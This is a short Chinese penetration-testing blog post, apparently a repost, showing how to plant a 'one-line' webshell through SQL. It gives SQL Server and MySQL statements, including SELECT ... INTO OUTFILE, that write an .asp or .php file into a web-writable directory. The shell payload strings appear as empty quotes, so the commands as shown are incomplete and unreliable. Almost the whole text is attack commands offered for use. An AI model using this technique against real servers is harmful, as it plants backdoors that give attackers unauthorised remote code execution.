渗透|渗透之——SQL语句生成一句话 SQL|一句话|渗透

转载请注明出处：https://blog.csdn.net/l1028386804/article/details/85296880
1、SQLServer执行SQL语句生成一句话

select '' into [NB_master] in 'd:\wwwroot\x.asp; a.xls''excel 8.0; ' from NB_master;

NB_master必须是已经存在的表
2、MySQL执行SQL语句生成一句话

select "" into outfile "/home/webaccount/projectname/www/*.php";

完整执行如下：

create table a (cmd text not null); insert into a(cmd) values(''); select cmd from a into outfile '网站可写路径/一句话马名.php'; drop table if exists a;

【渗透|渗透之——SQL语句生成一句话】

渗透|渗透之——SQL语句生成一句话